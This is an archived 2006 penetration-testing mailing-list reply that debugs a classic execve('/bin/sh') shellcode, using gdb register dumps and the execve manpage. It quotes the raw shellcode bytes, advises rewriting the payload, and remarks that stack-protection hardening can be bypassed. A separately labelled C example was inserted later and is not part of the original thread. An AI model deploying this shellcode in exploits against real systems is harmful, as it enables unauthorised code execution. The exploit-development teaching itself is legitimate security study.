Penetration Testing mailing list archives
Re: Shellcode itself segfaults
From: "Justin Ferguson" <jnferguson () gmail com>
Date: Mon, 19 Jun 2006 18:25:38 -0700
Hi Paul,
> -------------------------------------------------------------------------------
> char main[] =
>   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>   "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> -------------------------------------------------------------------------------
First let me suggest naming your array something else; I don't think your C code compiled unless you renamed main() and linked it yourself (i.e. ld -e). It's a side point though, name it something else, sc[] or whatever.

What I see is that just before you call int 0x80, you have 11/0x0b in the eax register (correct), a pointer to the string '/bin/sh' in the ebx register (correct), a pointer to a pointer to char, however this array is supposed to be null terminated and yours is not, and finally in the edx register you have a pointer to null.

(gdb) p $rax
$3 = 11
(gdb) x/s $rbx
0x5008a6 <sc+38>:       "/bin/sh"
(gdb) x/wx *$rcx
0x5008a6 <sc+38>:       0x6e69622f
(gdb)
0x5008aa <sc+42>:       0x0068732f
(gdb)
0x5008ae <sc+46>:       0x005008a6
(gdb) x/wx *$rdx
0x0:    Cannot access memory at address 0x0
(gdb) x/wx $rdx
0x5008b2 <completed.1+2>:       0x00000000

Please look at the prototype for execve(2), and read the manpage.

int execve(const char *filename, char *const argv[], char *const envp[]);

'Both argv and envp must be terminated by a null pointer.'

So, your **argv is broken as it's not terminated by a NULL pointer, and your **envp is broken because it is a NULL pointer. As to why it works, I've noticed through my experience that some implementations don't mind envp being NULL, while others shit the bed on you, so it's best to just set one up. Aleph1's shellcode is great for learning how the stack operates, but aside from that it's clunky and large; you should consider rewriting it using the stack and a series of pushes/movs, as it results in a smaller shellcode and gives you what you want.
> I also tested it on my gentoo-box with ssp and pie. Here it is impossible to actually smash the stack, however the shellcode itself works.
Nothing is impossible. SSP/PIE/hardened Gentoo in general makes it improbable, but not impossible; the flaws in all of the hardening tools have been well documented in Phrack and such.
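The execve(2) contract Justin quotes above (argv and envp both terminated by a NULL pointer, and envp never itself NULL) is easy to get right from C, and a small checker makes the failure mode visible. The following is an added example, not code from the original thread or from either poster; it assumes a POSIX system with /bin/sh available, and the helper names (ptr_array_is_terminated, run_shell_command) and the "exit 7" command are this example's own constructions.

```c
/* Added example (not from the original mailing-list thread): building the
 * argv/envp arrays for execve(2) the way the manpage requires, i.e. both
 * terminated by a NULL pointer, and checking that property before the call.
 * Assumes a POSIX system with /bin/sh. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return true if arr[0..max-1] contains a NULL terminator, i.e. execve
 * could walk the array without running off its end. A NULL array pointer
 * is reported as not terminated, matching the manpage's requirement that
 * envp be a real array rather than NULL. */
bool ptr_array_is_terminated(char *const arr[], size_t max)
{
    if (arr == NULL)
        return false;
    for (size_t i = 0; i < max; i++)
        if (arr[i] == NULL)
            return true;
    return false;
}

/* Fork and execve "/bin/sh -c <cmd>" with properly terminated argv and envp.
 * Returns the child's exit status, or -1 if the arrays fail the check or
 * fork/exec/wait failed. */
int run_shell_command(const char *cmd)
{
    char *argv[] = { "sh", "-c", (char *)cmd, NULL };   /* NULL-terminated */
    char *envp[] = { "PATH=/bin:/usr/bin", NULL };      /* NULL-terminated, and not NULL itself */

    if (!ptr_array_is_terminated(argv, 4) || !ptr_array_is_terminated(envp, 2))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/sh", argv, envp);
        _exit(127);               /* only reached if execve itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed: an argv with no NULL at the end, the defect discussed above. */
    char *bad[] = { "/bin/sh", "garbage" };
    printf("unterminated argv detected within 2 slots? %s\n",
           ptr_array_is_terminated(bad, 2) ? "no" : "yes");
    printf("sh -c 'exit 7' returned %d\n", run_shell_command("exit 7"));
    return 0;
}
```

The checker only proves a terminator exists within a bound you supply; it is a debugging aid for exactly the situation in the gdb session above, where x/wx on *$rcx walks past the last pointer without ever hitting a zero word.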
Current thread:
- Shellcode itself segfaults Paul Sebastian Ziegler (Jun 19)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 19)
- Re: Shellcode itself segfaults Peter Kosinar (Jun 20)
- Re: Shellcode itself segfaults Ronald van der Westen (Jun 20)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 20)
- Re: Shellcode itself segfaults Paul Sebastian Ziegler (Jun 21)
- Re: Shellcode itself segfaults Peter Kosinar (Jun 20)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 19)